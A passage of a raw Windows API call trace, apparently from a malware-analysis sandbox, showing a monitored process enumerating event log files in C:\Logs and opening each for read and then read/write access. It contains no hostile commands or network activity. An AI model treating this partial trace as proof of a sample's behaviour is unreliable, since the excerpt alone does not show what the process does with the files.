InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0071.910] AreFileApisANSI () returned 1 [0071.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0071.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82568 [0071.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=68 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 68 [0071.910] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.910] GetFileType (hFile=0x410) returned 0x1 [0071.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0071.910] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.911] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.911] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.911] CloseHandle (hObject=0x410) returned 1 [0071.911] AreFileApisANSI () returned 1 [0071.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0071.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x820e8 [0071.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x820e8, cchWideChar=68 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 68 [0071.911] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.911] GetFileType (hFile=0x410) returned 0x1 [0071.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x820e8 | out: hHeap=0x20000) returned 1 [0071.911] CloseHandle (hObject=0x410) returned 1 [0071.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0071.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0071.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0071.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0071.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0071.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0071.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0071.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0071.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0071.912] AreFileApisANSI () returned 1 [0071.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0071.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82688 [0071.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=68 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 68 [0071.912] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd9ec80, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xfd9ec80, ftLastAccessTime.dwHighDateTime=0x1d1a04f, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0071.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.912] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9658ef3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9658ef3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-GroupPolicy%4Operational.evtx", cAlternateFileName="MIE38D~1.EVT")) returned 1 [0071.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.913] AreFileApisANSI () returned 1 [0071.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0071.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0071.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0071.961] AreFileApisANSI () returned 1 [0071.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 56 [0071.961] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.961] GetFileType (hFile=0x410) returned 0x1 [0071.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.961] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.962] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.962] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.962] CloseHandle (hObject=0x410) returned 1 [0071.962] AreFileApisANSI () returned 1 [0071.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 56 [0071.962] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.962] GetFileType (hFile=0x410) returned 0x1 [0071.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.962] CloseHandle (hObject=0x410) returned 1 [0071.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0071.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0071.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0071.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0071.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.963] AreFileApisANSI () returned 1 [0071.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 56 [0071.963] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9658ef3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9658ef3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.963] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcc480, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9dcc480, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-HotspotAuth%4Operational.evtx", cAlternateFileName="MIE386~1.EVT")) returned 1 [0071.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.965] AreFileApisANSI () returned 1 [0071.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0071.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0071.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.965] AreFileApisANSI () returned 1 [0071.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 56 [0071.965] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.966] GetFileType (hFile=0x410) returned 0x1 [0071.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 